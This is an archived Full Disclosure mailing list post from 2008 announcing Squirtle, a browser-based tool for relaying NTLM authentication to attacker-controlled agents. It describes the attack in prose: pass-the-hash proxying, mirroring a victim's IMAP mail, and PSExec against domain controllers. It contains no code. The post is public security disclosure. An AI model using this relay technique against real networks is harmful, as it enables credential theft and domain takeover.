Full Disclosure mailing list archives

Re: NTLM Multiprotocol Replay attacks

From: Kurt Grutzmacher <grutz () jingojango net>
Date: Sat, 15 Nov 2008 16:26:57 -0600

On Fri, Nov 14, 2008 at 09:37:46PM +0100, Andres Tarasco wrote:

I have published a new proof of concept tool, named "Smbrelay3", that is
able to replay NTLM authentication from several protocols like
SMB/HTTP/IMAP/..
http://www.tarasco.org/security/smbrelay/index.html


Great little tool from you guys! It's probably about time that I told
FullDisc about Squirtle since releasing it at this year's DefCon.

  http://squirtle.googlecode.com/

What's Squirtle? It's simply an authentication bridge that controls a
browser to allow an attacker to request NTLM authentication at any time
as long as their browser is running with the Squirtle Javascript. "Evil
Agents" begin their authentication requests against different servers or
workstations,, pass Squirtle a session ID and the relevant details to 
complete authentication (flags, nonce, server, domain, etc) and wait for 
the Type 3 response.

I've dubbed this attack "Pass The Dutchie" since we're using an already 
rolled group of hashes and are ready to pass them around to our friends.

Current "Evil Agent" support I've written:

 - NTLMAPS - HTTP proxy w/ NTLM support (plus pass-the-hash enabled)
 - IMAP Mirror - Download all IMAP folders of a victim
 - Metasploit 3.2 - PSExec against domain controllers? Yeah!

Per HD's blog post and your source code comment, MS08-068 only limits an
attackerfrom attempting to connect back to the user's workstation where
authentication began. Not a problem for Squirtle since you can attack
anything the victim has access to. Domain Admin clicked that link? Yeah,
the game is over.

If the DeepSec videos are published by Help Net Security you will see the
latest talk on Squirtle/NTLM SSO and view the demo attacks. I'll put
some video examples of Squirtle up before the end of the week.

-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."

Attachment: _bin
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

NTLM Multiprotocol Replay attacks Andres Tarasco (Nov 14)
- Re: NTLM Multiprotocol Replay attacks Kurt Grutzmacher (Nov 15)
- Re: NTLM Multiprotocol Replay attacks yersinia (Nov 16)
  - Re: NTLM Multiprotocol Replay attacks Andres Tarasco (Nov 16)
- <Possible follow-ups>
- Re: NTLM Multiprotocol Replay attacks adrian . lamo (Nov 16)
  - Re: NTLM Multiprotocol Replay attacks n3td3v (Nov 17)
    - Re: NTLM Multiprotocol Replay attacks Valdis . Kletnieks (Nov 17)
- Re: NTLM Multiprotocol Replay attacks william () lefkovics net (Nov 17)
  - Re: NTLM Multiprotocol Replay attacks Trollie Fingers (Nov 17)
    - Re: NTLM Multiprotocol Replay attacks William Lefkovics (Nov 17)
    - Re: NTLM Multiprotocol Replay attacks Valdis . Kletnieks (Nov 17)
    - Re: NTLM Multiprotocol Replay attacks Valdis . Kletnieks (Nov 17)

(Thread continues...)